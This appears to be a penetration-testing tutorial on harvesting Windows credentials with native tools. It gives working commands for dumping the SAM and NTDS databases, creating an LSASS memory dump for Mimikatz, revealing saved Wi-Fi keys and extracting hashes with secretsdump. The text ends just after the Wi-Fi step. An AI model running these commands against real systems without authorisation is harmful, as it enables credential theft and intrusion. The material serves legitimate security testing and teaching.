Most penetration testing toolkits offer the ability to extract host credentials. However being able to carry out this task in environments where code execution may be detected, or is prevented through application whitelisting is useful.
In this post we’re going to be looking at how to extract some of these credentials only using native Windows tools.
Extracting the SAM database
The Security Account Manager (SAM) database stores user passwords on a system. Given local administrator access to a host, these credentials can be retrieved by taking a backup of a portion of the systems registry:
reg save hklm\sam c:\SAM reg save hklm\system c:\SYSTEM reg save hklm\security c:\SECURITY
The files can then be copied to a Linux system, and recontructed using impacket-secretsdump:
impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL
Extracting the NTDS database
The New Technology Directory Services (NTDS) database stores passwords for users in an Active Directory domain. The file is typically located at %SystemRoot%\NTDS\Ntds.dit. Since the file is locked whilst the domain controller is powered on, taking a copy of the file requires using volume shadow copies.
The ntdsutil utility can be used to backup the database:
ntdsutil "ac in ntds" i "cr fu c:\temp" q q
Copy these files to a Linux system and extract using secretsdump:
impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Extracting Logon Credentials From LSASS
The Local Security Authority Subsystem Service (LSASS) is a process responsible for enforcing security on a Windows system. By creating a memory dump of the process, we can extract plaintext credentials.
With local administrator rights on a host, open task manager, find lsass.exe, right click and select “Create Dump File”
LSASS can also be extracted using the command line using the comsvc DLL:
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Tasks\lsass.dmp full
Mimikatz can then dump the plaintext login credentials:
sekurlsa::Minidump lsass.DMP sekurlsa::logonPasswords
Extracting Wi-Fi Passwords
Wi-Fi passwords can be extracted from the command line by entering the following:
netsh wlan show profiles netsh wlan show profile name="ConnectionName" key=clear
The security key will be shown under the key content section: